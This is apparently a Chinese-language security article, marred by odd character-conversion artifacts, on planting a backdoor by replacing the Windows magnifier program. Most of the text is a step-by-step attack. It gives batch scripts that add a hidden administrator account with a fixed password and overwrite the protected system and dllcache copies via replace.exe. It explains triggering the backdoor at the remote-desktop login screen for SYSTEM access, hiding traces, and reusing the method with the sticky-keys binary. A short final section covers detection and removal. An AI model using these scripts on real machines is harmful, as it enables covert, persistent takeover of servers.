放大鏡程序，最狡猾的后門

放大鏡程序（magnify.exe）是Windows 2000/XP/2003系統(tǒng)集成的一個小工具，它是為方便視力障礙用戶而設(shè)計的。在用戶登錄系統(tǒng)前可以通過“Win+U”組合鍵調(diào)用該工具，因此攻擊者就用精心構(gòu)造的magnify.exe同名文件替換放大鏡程序，從而達(dá)到控制服務(wù)器的目的。

通常情況下，攻擊者通過構(gòu)造的magnify.exe程序創(chuàng)建一個管理員用戶，然后登錄系統(tǒng)。當(dāng)然有的時候他們也會通過其直接調(diào)用命令提示符（cmd.exe）或者系統(tǒng)shell（explorer.exe）。需要說明的是，這樣調(diào)用的程序都是system權(quán)限，即系統(tǒng)最高權(quán)限。不過，以防萬一當(dāng)管理員在運行放大鏡程序時發(fā)現(xiàn)破綻，攻擊者一般通過該構(gòu)造程序完成所需的操作后，最后會運行真正的放大鏡程序，以蒙騙管理員。其利用的方法是：

（1）構(gòu)造批處理腳本

@echo off  
 
net user gslw$ test168 /add  
 
net localgroup administrators gslw$ /add  
 
%Windir%\system32\nagnify.exe  
 
exit 

將上面的腳本保存為magnify.bat，其作用是創(chuàng)建一個密碼為test168的管理員用戶gslw$，最后運行改名后的放大鏡程序nagnify.exe。（圖2）

（2）文件格式轉(zhuǎn)換

因為批處理文件magnify.bat的后綴是bat，必須要將其轉(zhuǎn)換為同名的exe文件才可以通過組合鍵Win+U調(diào)用。攻擊者一般可以利用WinRar構(gòu)造一個自動解壓的exe壓縮文件，當(dāng)然也可以利用bat2com、com2exe進(jìn)行文件格式的轉(zhuǎn)換。我們就以后面的方法為例進(jìn)行演示。

打開命令行，進(jìn)入bat2com、com2exe工具所在的目錄，然后運行命令“bat2com magnify.bat”將magnify.bat轉(zhuǎn)換成magnify.com，繼續(xù)運行命令“com2exe magnify.com”將magnify.com轉(zhuǎn)換成magnify.exe，這樣就把批處理文件轉(zhuǎn)換成和放大鏡程序同名的程序文件。（圖3）

（3）放大鏡文件替換

下面就需要用構(gòu)造的magnify.exe替換同名的放大鏡程序文件，由于Windows對系統(tǒng)文件的自我保護(hù)，因此不能直接替換，不過Windows提供了一個命令replace.exe，通過它我們可以替換系統(tǒng)文件。另外，由于系統(tǒng)文件在%Windir%\system32\dllcache中有備份，為了防止文件替換后又重新還原，所有我們首先要替換該目錄下的magnify.exe文件。假設(shè)構(gòu)造的magnify.exe文件在%Windir%目錄下，我們可以通過一個批處理即可實現(xiàn)文件的替換。

@echo off  
 
copy %Windir%\system32\dllcache\magnify.exe nagnify.exe  
 
copy %Windir%\system32\magnify.exe nagnify.exe  
 
replace.exe %Windir%\magnify.exe %Windir%\system32\dllcache  
 
replace.exe %Windir%\magnify.exe %Windir%\system32  
 
exit 

上面批處理的功能是，首先將放大鏡程序備份為nagnify.exe，然后用同名的構(gòu)造程序?qū)⑵涮鎿Q。（圖4）

（4）攻擊利用

當(dāng)完成上述操作后，一個放大鏡后門就做成了。然后攻擊者通過遠(yuǎn)程桌面連接服務(wù)器，在登錄界面窗口摁下本地鍵盤的“Win+U”組合鍵，選擇運行其中的“放大鏡”，此刻就在服務(wù)器上創(chuàng)建了一個管理員用戶gslw$并打開了放大鏡工具，然后攻擊者就開業(yè)通過該帳戶登錄服務(wù)器。當(dāng)然，攻擊者在斷開登錄前會刪除所有與該帳戶相關(guān)的信息，以防被管理員發(fā)現(xiàn)。（圖5）
 

（5）防范措施

進(jìn)入%Windir%\system32\查看magnify.exe的文件圖標(biāo)是否是原來的放大鏡的圖標(biāo)，如果不是的話極有可能被植入了放大鏡后門。當(dāng)然，有的時候攻擊者也會將其文件圖標(biāo)更改為和原放大鏡程序的圖標(biāo)一樣。此時我們可以查看magnify.exe文件的大小和修改時間，如果這兩樣有一項不符就比較懷疑了。

我們也可以先運行magnify.exe，然后運行l(wèi)usrmgr.msc查看是否有可疑的用戶。如果確定服務(wù)器被放置了放大鏡后門，首先要刪除該文件，然后恢復(fù)正常的放大鏡程序。當(dāng)然，我們也可以做得更徹底一些，用一個無關(guān)緊要的程序替換放大鏡程序。甚至我們也可以以其人之道還治其人之身，構(gòu)造一個magnify.exe，通過其警告攻擊者或者進(jìn)行入侵監(jiān)控和取證。

與放大鏡后門類似的還有“粘滯鍵”后門，即按下SHIEF鍵五次可以啟動粘滯鍵功能，其利用和防范措施與放大鏡后門類似，只是將magnify.exe換成了sethc.exe。

【編輯推薦】

1. 后門木馬隱藏技術(shù)分析
2. WINDOWS系統(tǒng)后門實例一
3. 如何全面清除計算機電腦病毒
4. Windows組策略保障共享目錄安全
5. 安全設(shè)置Windows組策略有效阻止黑客